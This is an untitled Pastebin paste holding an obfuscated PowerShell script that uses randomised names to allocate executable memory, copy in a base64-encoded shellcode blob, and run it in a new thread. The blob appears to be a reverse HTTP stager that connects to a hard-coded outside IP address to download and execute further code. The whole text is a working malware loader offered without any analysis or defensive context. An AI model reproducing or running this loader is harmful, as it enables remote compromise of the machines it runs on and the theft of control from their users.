SHARE
TWEET

Untitled

a guest Mar 13th, 2017 137 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function oeIl1 {
  2.     Param ($mRJdu, $sXIUCf7H_3MS)      
  3.     $xZF = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
  4.    
  5.     return $xZF.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($xZF.GetMethod('GetModuleHandle')).Invoke($null, @($mRJdu)))), $sXIUCf7H_3MS))
  6. }
  7.  
  8. function sINlrYDK {
  9.     Param (
  10.         [Parameter(Position = 0, Mandatory = $True)] [Type[]] $cXm,
  11.         [Parameter(Position = 1)] [Type] $pzRhvFbn = [Void]
  12.     )
  13.    
  14.     $ydtJTxy = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
  15.     $ydtJTxy.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $cXm).SetImplementationFlags('Runtime, Managed')
  16.     $ydtJTxy.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $pzRhvFbn, $cXm).SetImplementationFlags('Runtime, Managed')
  17.    
  18.     return $ydtJTxy.CreateType()
  19. }
  20.  
  21. [Byte[]]$eyePao5PK7e = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1obmV0AGh3aW5pVGhMdyYH/9Ux21NTU1NTaDpWeaf/1VNTagNTU2hQEQAA6MwAAAAvODZTREo5aVY0OVczQ2JZSTc4aTJWQXBwMHpBcWJpMEJDTEt3WU0zZkZHcUgxeF9tWElGa01QRUpqSklJcm5jODhPbWJCT0wAUGhXiZ/G/9WJxlNoADLghFNTU1dTVmjrVS47/9WWagpfaIAzAACJ4GoEUGofVmh1Rp6G/9VTU1NTVmgtBhh7/9WFwHUIT3XZ6EsAAABqQGgAEAAAaAAAQABTaFikU+X/1ZNTU4nnV2gAIAAAU1ZoEpaJ4v/VhcB0z4sHAcOFwHXlWMNf6Hf///8xMzguMjAxLjc1LjIyNwC78LWiVmoAU//V")
  22.        
  23. $dszlZgm = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oeIl1 kernel32.dll VirtualAlloc), (sINlrYDK @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $eyePao5PK7e.Length,0x3000, 0x40)
  24. [System.Runtime.InteropServices.Marshal]::Copy($eyePao5PK7e, 0, $dszlZgm, $eyePao5PK7e.length)
  25.  
  26. $saHTYhFSI9 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oeIl1 kernel32.dll CreateThread), (sINlrYDK @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$dszlZgm,[IntPtr]::Zero,0,[IntPtr]::Zero)
  27. [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oeIl1 kernel32.dll WaitForSingleObject), (sINlrYDK @([IntPtr], [Int32]))).Invoke($saHTYhFSI9,0xffffffff) | Out-Null
RAW Paste Data
Top